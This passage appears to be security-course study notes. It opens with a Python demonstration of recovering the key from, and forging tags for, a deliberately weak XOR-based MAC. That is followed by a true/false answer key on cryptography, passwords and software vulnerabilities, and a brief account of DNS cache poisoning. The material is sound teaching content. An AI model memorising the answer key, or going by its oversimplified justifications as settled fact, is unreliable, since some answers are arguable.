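The key recovery takes one XOR, as the sketch below shows. The messages are made-up examples and the helper names are illustrative.

```python
import hashlib
import os

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def weak_mac(key: bytes, message: bytes) -> bytes:
    """The proposed construction: MAC(M) = SHA-256(M) XOR K."""
    return xor(hashlib.sha256(message).digest(), key)

key = os.urandom(32)
m = b"pay alice 10"
t = weak_mac(key, m)                 # attacker observes the pair (m, t)

recovered = xor(t, hashlib.sha256(m).digest())
print(recovered == key)              # True: K = T XOR SHA-256(M)

# With the key in hand, the attacker can tag any message.
forged = b"pay mallory 10000"
print(weak_mac(recovered, forged) == weak_mac(key, forged))   # True
```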
Is replacing password hashing with symmetric encryption a good idea?
No because if you find the secret key you get access to all the passwords
Explain how a DNS cache poisoning attack works
Attacker takes advantage of a DNS server using a predictable UDP port
You can flood the victim name server with forged answers, guessing the QID,
until one of them is correct, after which the victim is routed to a malicious site
FALSE: It is impossible to see the contents of a digital certificate without knowing the
CA's secret (signing) key
The contents of a digital certificate are public; the CA's verification key is only needed to check the signature
TRUE: Counter-mode encryption using AES is semantically secure, assuming AES is a
pseudorandom permutation/function
FALSE: Mono-alphabetic substitution ciphers are insecure under an unknown-plaintext
attack, but remain secure under known-plaintext attacks
Mono-alphabetic substitution ciphers are not secure under known-plaintext
attacks because you can still use frequency analysis to find the key
FALSE: Zero-day exploits can be found on the NVD webpage
It wouldn't be a zero-day exploit if it could be found on the NVD webpage; a zero-day is a
vulnerability that is unknown to the vendor
FALSE: DES is more secure than AES
The DES keyspace is too small so it is less secure than AES
TRUE: Counter-mode encryption never guarantees integrity
TRUE: EtM is a better solution than MtE
FALSE: Every TLS certificate is issued by a root certification authority
Certificates are issued by Issuing CAs
TRUE: Multi-factor authentication is preferable over single-factor authentication
TRUE: SHA-512 is much slower than MD5
FALSE: The IP protocol uses digital signatures to avoid spoofing
The IP protocol has nothing to do with digital signatures; spoofing is instead mitigated by upstream ingress
filtering
TRUE: TLS relies on both public- and secret-key cryptography
TRUE: If an encryption scheme is semantically secure, then the ciphertext length
cannot be equal to the plaintext length
TRUE: The running time of the RSA decryption algorithm should not depend on the value
of the secret exponent d
TRUE: MD5 is faster than SHA-512
FALSE: Choosing a password longer than 6 characters is an overkill
6 character passwords are insanely easy to brute-force
FALSE: Marking memory pages as either writeable or executable completely resolves
control-flow hijacking attacks
Still susceptible to return-to-libc attacks
TRUE: Dynamic memory allocation typically occurs on the heap
FALSE: Using strncpy instead of strcpy completely prevents buffer overflows
If the programmer passes strncpy a length larger than the destination buffer,
buffer overflows can still occur
FALSE: Cookies are problematic, because they are sent along with every HTTP request
made by the browser, no matter which host is being accessed
Cookies are scoped, not sent along with every HTTP request made by the
browser
TRUE: A block cipher with a 32-bit key is not secure
FALSE: UNIX primarily uses capabilities for access control
UNIX uses access control lists
FALSE: Zero-day vulnerabilities are assigned a CVE number as soon as they are
exploited for the first time
Impossible because the vendor doesn't know about zero-day vulnerabilities
TRUE: CBC encryption using AES is semantically secure if AES is a pseudorandom
function (PRF)
TRUE: A 4096-bit RSA modulus is considered a safe choice given present day
factoring attacks
FALSE: A mono-alphabetic substitution cipher is semantically secure
Reveals lots of information about plaintext including frequency and whether it
was encrypted earlier
TRUE: Digital certificates help preventing man-in-the-middle attacks in TLS/SSL
FALSE: Setting one's password to an uncommon English word prevents password
cracking attacks as long as the word is longer than 12 letters
Doesn't prevent password cracking if badly hashed
FALSE: A Gmail password consisting of 6 randomly chosen letters can be recovered in
a few seconds in an online attack
Online attacks can be mitigated by limiting requests
FALSE: Any 25-character long password is sufficiently secure
Length by itself will never make your password sufficiently secure
FALSE: Using CBC-mode encryption with DES provides a sufficient security margin for
most applications
DES is not sufficient, must use AES
TRUE: A mono-alphabetic substitution cipher should not be used for a secure
application
FALSE: The window of vulnerability starts as soon as a new patch for this vulnerability
has been released by the vendor
Window of vulnerability starts as soon as system is vulnerable
FALSE: AES is semantically secure
It is deterministic so it isn't semantically secure
TRUE: CBC-mode encryption never guarantees integrity
FALSE: A 512-bit RSA modulus is considered a safe choice given present day factoring
attacks
Should be around 4096-bit for modern day standards
TRUE: Certificates are the most important application of digital signatures
TRUE: In the Biba policy model, there is no flow of information from a lower to higher
security (integrity) level

Tools | Confidentiality | Integrity | Availability
Message authentication code
Public-key certificate
Public-key encryption
Backup system
Password-based login
Mandatory access control
An auxiliary power unit
